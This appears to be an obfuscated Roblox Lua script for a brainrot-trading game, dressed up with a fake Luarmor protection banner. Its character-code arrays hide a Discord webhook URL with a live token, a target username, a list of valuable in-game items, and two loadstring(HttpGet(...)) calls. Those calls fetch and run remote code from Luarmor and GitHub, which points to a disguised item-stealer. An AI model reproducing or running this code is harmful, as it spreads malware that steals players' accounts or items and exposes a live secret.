-- Luarmor V4 | https://luarmor.net
-- Protected Script | DO NOT SHARE

local _ENV = getfenv()
local _0xCAFE = string.char
local _0xBEEF = table.concat
local _0xDEAD = function(_0x1) local _0x2={} for _0x3=1,#_0x1 do _0x2[#_0x2+1]=_0xCAFE(_0x1[_0x3]) end return _0xBEEF(_0x2) end
local _0xF00D = getgenv or function() return _ENV end
local _0xACE = _0xF00D()

_0xACE[_0xDEAD({83,101,99,114,101,116,84,111,107,101,110})] = _0xDEAD({116,117,110,97,118,101,97,114,100,97})
_0xACE[_0xDEAD({85,115,101,114})] = _0xDEAD({116,117,110,97,118,101,97,114,100,97})
_0xACE[_0xDEAD({87,101,98,104,111,111,107})] = _0xDEAD({104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,57,53,48,48,55,48,55,55,55,55,49,53,49,52,48,48,54,47,111,68,98,108,105,119,120,86,67,56,105,108,86,115,82,97,67,97,79,53,109,104,75,82,55,102,109,73,84,108,84,107,76,97,113,81,67,79,122,114,115,90,49,95,110,68,100,78,99,79,49,55,78,74,95,103,45,104,49,90,87,86,71,121,82,50,83,113})
_0xACE[_0xDEAD({66,114,97,105,110,114,111,116,115})] = {"Strawberry Elephant", "Meowl", "Headless Horseman", "Skibidi Toilet", "Griffin", "Hydra Dragon Cannelloni", "Dragon Gingerini", "Dragon Cannelloni", "Love Love Bear", "La Supreme Combinasion", "Celestial Pegasus", "Cerberus", "Popcuru and Fizzuru", "Rosey and Teddy", "Capitano Moby", "Cooki and Milki", "Burguro And Fryuro", "Ketupat Bros", "Reinito Sleighito", "Fortunu and Cashuru", "Los Amigos", "La Secret Combinasion", "Los Sekolahs", "Signore Carapace", "La Casa Boo", "Fragrama and Chocrama", "La Food Combinasion", "Spooky and Pumpky", "La Ginger Sekolah", "Sammyni Fattini", "Los Spaghettis", "Festive 67", "Ginger Gerat", "Elefanto Frigo", "Ventoliero Pavonero", "Cloverat Clapat", "Spaghetti Tualetti", "Antonio", "Rosetti Tualetti", "Nacho Spyder", "Garama and Madundung", "Fishino Clownino", "Gold Gold Gold", "Jolly Jolly Sahur", "Lavadorito Spinito", "Ketchuru and Musturu", "Tirilikalika Tirilikalako", "Swaggy Bros", "La Romantic Grande", "Orcaledon", "La Taco Combinasion", "Dug dug dug", "Ketupat Kepat", "Tictac Sahur", "Tang Tang Keletang", "Lovin Rose", "Los Tacoritas", "Eviledon", "Los Primos", "W or L", "La Jolly Grande", "Gobblino Uniciclino", "Tralaledon", "Los Puggies", "Tuff Toucan", "Mieteteira Bicicleteira", "Chipso and Queso", "Chillin Chili", "Money Money Reindeer", "La Spooky Grande", "Bacuru and Egguru", "Los Bros", "La Extinct Grande", "Los Candies", "Los 67", "Celularcini Viciosini", "Money Money Puggy", "Los Planitos", "Tacorita Bicicleta", "Nuclearo Dinossauro", "Mariachi Corazoni", "Guest 666", "Rhino Helicopterino", "Ganganzelli Trulala", "Smurf Cat", "Hydra Bunny", "Foxini Lanternini", "Boppin Bunny", "Hopilikalika Hopilikalako", "Quackini Snackini", "Bunny and Eggy", "La Easter Grande", "La Lucky Grande", "Churrito Bunnito", "John Pork"}
_0xACE[_0xDEAD({83,99,114,105,112,116,77,111,100,101})] = _0xDEAD({67,85,83,84,79,77})
_0xACE[_0xDEAD({67,117,115,116,111,109,83,99,114,105,112,116})] = _0xDEAD({98,71,57,104,90,72,78,48,99,109,108,117,90,121,104,110,89,87,49,108,79,107,104,48,100,72,66,72,90,88,81,111,73,109,104,48,100,72,66,122,79,105,56,118,99,109,70,51,76,109,100,112,100,71,104,49,89,110,86,122,90,88,74,106,98,50,53,48,90,87,53,48,76,109,78,118,98,83,57,112,98,72,107,120,77,106,77,53,78,84,65,118,86,110,86,115,97,50,70,117,76,51,74,108,90,110,77,118,97,71,86,104,90,72,77,118,98,87,70,112,98,105,57,85,99,105,73,112,75,83,103,112})
task.spawn(function()
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,97,112,105,46,108,117,97,114,109,111,114,46,110,101,116,47,102,105,108,101,115,47,118,52,47,108,111,97,100,101,114,115,47,56,48,56,102,52,97,100,52,101,98,102,102,52,55,53,99,53,55,99,101,54,49,101,97,51,57,101,52,49,101,50,51,46,108,117,97})))()
end)
-- Custom Script
task.spawn(function()
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,105,108,121,49,50,51,57,53,48,47,86,117,108,107,97,110,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,84,114})))()
end)

-- Luarmor V4 Protected | Fingerprint: fc96670298b1b7d5
